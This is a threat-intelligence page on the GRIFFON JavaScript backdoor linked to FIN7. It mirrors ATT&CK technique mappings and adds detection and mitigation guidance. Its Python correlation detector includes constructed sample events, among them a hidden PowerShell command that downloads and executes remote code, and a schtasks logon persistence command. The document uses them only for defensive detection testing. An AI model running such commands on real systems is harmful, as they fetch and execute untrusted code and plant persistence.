S0417: GRIFFON
Analyst context for executives and security teams
GRIFFON matters because it is a Windows JavaScript backdoor associated in ATT&CK with FIN7, a financially motivated group. For leaders, the practical concern is not the malware name alone, but the set of behaviors ATT&CK links to it: script-based execution, PowerShell use, persistence through scheduled tasks or startup locations, host and domain discovery, and screen capture. Those behaviors test whether the organization can see and investigate suspicious scripting activity before it becomes a longer-running intrusion.
Executive priority
Prioritize validation of Windows endpoint visibility and response readiness around script execution and persistence. This object is especially relevant for organizations assessing exposure to financially motivated intrusion activity and for teams that need audit-ready evidence that scheduled task changes, Run key/startup folder changes, PowerShell activity, domain group discovery, and screen capture-like behavior are monitored and triaged. Executives should ask whether SOC playbooks connect these signals into an intrusion story rather than handling them as isolated low-confidence alerts.
Technical view
ATT&CK provides no dedicated detection text for GRIFFON, so defenders should build coverage from the linked behaviors: T1053.005 Scheduled Task, T1059.001 PowerShell, T1059.007 JavaScript, T1069.002 Domain Groups, T1082 System Information Discovery, T1113 Screen Capture, T1124 System Time Discovery, and T1547.001 Registry Run Keys / Startup Folder. On Windows, validate telemetry for script hosts and PowerShell process activity, task creation or modification, autorun registry/startup folder changes, command patterns that enumerate domain groups or system details, and unusual screenshot-related collection from nonstandard processes. Treat relationship-driven detections as behavioral hypotheses requiring local baselining and investigation context.
Likely telemetry
- Windows process creation and command-line telemetry for PowerShell, JavaScript/JScript/script host execution, and discovery commands
- PowerShell logging where available, including script block logging (Event ID 4104) and module logging (Event ID 4103), or the EDR equivalent of script content and invoked commands
- Windows Task Scheduler creation, modification, and execution events (Security log 4698/4702 and the Microsoft-Windows-TaskScheduler/Operational log where enabled)
- Registry monitoring for Run/RunOnce key changes (Sysmon Event ID 12/13/14 or Security 4657 with a SACL on the keys) and file monitoring for startup folder additions
- Endpoint telemetry showing domain group enumeration and system information/time discovery activity
Detection direction
- Correlate script execution with persistence changes, especially PowerShell or JavaScript activity followed by scheduled task creation or Run key/startup folder modification.
- Baseline legitimate administrative use of PowerShell, scheduled tasks, and domain group queries to reduce false positives without suppressing rare or newly observed combinations.
- Look for discovery activity occurring soon after script execution, including domain group enumeration, system information collection, and system time checks.
- Review whether screen capture detections exist at all; many environments lack reliable coverage for this behavior unless EDR or detailed host telemetry is deployed.
- Because ATT&CK does not provide GRIFFON-specific detection guidance, avoid relying on signatures alone; validate behavior-based detections mapped to the related techniques.
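The first two detection directions above (script execution followed by a persistence change, tied together per host and user) can be expressed directly as correlation logic. The following is an added example for this page, not GRIFFON code and not a MITRE artifact. It assumes Sysmon-style records (process creation as Event ID 1, registry value set as Event ID 13, with the writing process as the image); every field name, the ten-minute window, and all sample records are constructed.

```python
# Added example: correlate script-host / PowerShell execution with a
# persistence change by the same host and user inside a short window.
# Event shapes are assumed, Sysmon-style; sample records are constructed.
from dataclasses import dataclass
from datetime import datetime, timedelta

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "pwsh.exe"}
RUN_KEY_MARKERS = (
    r"\microsoft\windows\currentversion\run",  # also matches ...\runonce
    r"\microsoft\windows\currentversion\explorer\shell folders",
)
WINDOW = timedelta(minutes=10)  # assumed; tune against local baselines


@dataclass
class Event:
    ts: datetime
    host: str
    user: str
    kind: str    # "process" (Sysmon 1) or "registry" (Sysmon 13)
    image: str   # process image; for registry events, the writing process
    detail: str  # command line, or the registry TargetObject


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def is_script_exec(e: Event) -> bool:
    return e.kind == "process" and image_name(e.image) in SCRIPT_HOSTS


def is_persistence(e: Event) -> bool:
    d = e.detail.lower()
    if e.kind == "registry":
        return any(m in d for m in RUN_KEY_MARKERS)          # T1547.001
    return e.kind == "process" and image_name(e.image) == "schtasks.exe" and "/create" in d  # T1053.005


def correlate(events, window=WINDOW):
    """Pair each persistence change with the most recent script-host execution
    by the same host and user within `window`. Returns (trigger, persistence) pairs."""
    last_script = {}
    hits = []
    for e in sorted(events, key=lambda ev: ev.ts):
        key = (e.host.lower(), e.user.lower())
        if is_script_exec(e):
            last_script[key] = e
        elif is_persistence(e):
            trig = last_script.get(key)
            if trig is not None and e.ts - trig.ts <= window:
                hits.append((trig, e))
    return hits


T0 = datetime(2024, 5, 1, 9, 0, 0)  # constructed timestamps
SAMPLE_EVENTS = [  # constructed records, not real telemetry
    # JScript run from a user-writable path, then a Run key value written by the same process
    Event(T0, "WS01", r"CORP\jdoe", "process", r"C:\Windows\System32\wscript.exe",
          r"wscript.exe //B //E:JScript C:\Users\jdoe\AppData\Local\Temp\inv.js"),
    Event(T0 + timedelta(seconds=90), "WS01", r"CORP\jdoe", "registry", r"C:\Windows\System32\wscript.exe",
          r"HKU\S-1-5-21-1-2-3-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater"),
    # Hidden PowerShell followed by a logon-triggered task
    Event(T0 + timedelta(minutes=3), "WS01", r"CORP\jdoe", "process",
          r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          'powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(\'http://example.invalid/a\')"'),
    Event(T0 + timedelta(minutes=4), "WS01", r"CORP\jdoe", "process", r"C:\Windows\System32\schtasks.exe",
          r'schtasks.exe /Create /SC ONLOGON /TN Updater /TR "wscript.exe C:\Users\jdoe\AppData\Roaming\upd.js"'),
    # Deployment account creating a task with no preceding script activity: no hit
    Event(T0 + timedelta(minutes=30), "WS02", r"CORP\svc_deploy", "process", r"C:\Windows\System32\schtasks.exe",
          r'schtasks.exe /Create /SC DAILY /TN Inventory /TR "C:\Program Files\Agent\inv.exe"'),
    # Script execution and a Run key change twenty minutes apart: outside the window, no hit
    Event(T0 + timedelta(hours=1), "WS01", r"CORP\jdoe", "process", r"C:\Windows\System32\cscript.exe",
          r"cscript.exe C:\Scripts\logon.vbs"),
    Event(T0 + timedelta(hours=1, minutes=20), "WS01", r"CORP\jdoe", "registry", r"C:\Windows\regedit.exe",
          r"HKU\S-1-5-21-1-2-3-1001\Software\Microsoft\Windows\CurrentVersion\Run\Tool"),
]


def detect(events=SAMPLE_EVENTS):
    """Human-readable alert lines for each correlated pair."""
    return [
        f"{p.host} {p.user}: {image_name(t.image)} at {t.ts:%H:%M:%S} -> {image_name(p.image)} {p.detail}"
        for t, p in correlate(events)
    ]


if __name__ == "__main__":
    for line in detect():
        print(line)
```

Run against the constructed sample, the logic produces two alerts (the JScript/Run key pair and the PowerShell/schtasks pair) and stays silent on the deployment account's task and on the out-of-window pair. The "most recent script execution" pairing is a deliberate simplification: in production, also join on parent process or logon ID where the telemetry carries them, and feed the deployment account's task paths into a baseline rather than hard-coding exceptions.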
Mitigation priorities
- Harden and monitor Windows scripting environments, including governance for PowerShell and JavaScript/JScript execution where operationally feasible.
- Restrict who can create scheduled tasks and modify autorun locations, and alert on changes outside known software management paths.
- Apply least privilege to user and administrative accounts so that enumerating domain groups does not readily hand an adversary a map from a compromised workstation to privileged accounts.
- Maintain endpoint logging and EDR retention sufficient for incident response reconstruction across execution, persistence, discovery, and collection behaviors.
- Document detection and response coverage as compliance evidence, including what telemetry is collected, retained, and reviewed for the related ATT&CK techniques.
Analyst notes and limits
The strongest decision value comes from the relationships rather than the malware description itself. GRIFFON is described by ATT&CK as a JavaScript backdoor used by FIN7, and FIN7 is described as financially motivated with targeting across multiple industries. Local risk prioritization should consider whether the organization has Windows endpoints, valuable credentials, and business processes where stealthy script-based persistence would materially affect operations.
The supplied ATT&CK object has no official detection text, no malware aliases, and no object-level tactics. The FIN7 relationship context is truncated, and the technique descriptions are general ATT&CK descriptions rather than GRIFFON-specific procedures. This analysis therefore avoids claims about current activity, prevalence, impact, or guaranteed detection, and requires environment-specific validation.
GRIFFON
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1113 | Screen Capture | GRIFFON has used a screenshot module that can be used to take a screenshot of the remote system.[1] |
| Enterprise | T1069.002 | Domain Groups | GRIFFON has used a reconnaissance module that can be used to retrieve Windows domain membership information.[1] |
| Enterprise | T1124 | System Time Discovery | GRIFFON has used a reconnaissance module that can be used to retrieve the date and time of the system.[1] |
| Enterprise | T1059.007 | JavaScript | GRIFFON is written in and executed as JavaScript.[1] |
| Enterprise | T1082 | System Information Discovery | GRIFFON has used a reconnaissance module that can be used to retrieve information about a victim's computer, including the resolution of the workstation.[1] |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder | GRIFFON has used a persistence module that stores the implant inside the Registry, which executes at logon.[1] |
| Enterprise | T1053.005 | Scheduled Task | GRIFFON has used |
| Enterprise | T1059.001 | PowerShell | GRIFFON has used PowerShell to execute the Meterpreter downloader TinyMet.[1] |
Groups, software, and campaigns
G0046: FIN7
FIN7 is a financially-motivated threat group that has been active since 2013. FIN7 has targeted the retail, restaurant, hospitality, software, consulting, financial services, medical equipment, cloud services, media, food and beverage, transportation, pharmaceutical, and utilities industries in the United States. A portion of FIN7 was operated out of a front company called Combi Security and often used point-of-sale malware for targeting efforts. Since 2020, FIN7 shifted operations to big game hunting (BGH), including use of REvil ransomware and their own Ransomware-as-a-Service (RaaS), Darkside. FIN7 may be linked to the Carbanak Group, but multiple threat groups have been observed using Carbanak, leading these groups to be tracked separately.[1][2][3][4][5][6][7]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources: Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.1 | | Current bundle | 9a4c6fe01bc4… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
[1] SecureList Griffon May 2019: Namestnikov, Y. and Aime, F. (2019, May 8). FIN7.5: the infamous cybercrime rig "FIN7" continues its activities. SecureList. Retrieved October 11, 2019.
[2] mitre-attack S0417: MITRE ATT&CK software entry S0417, GRIFFON.
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.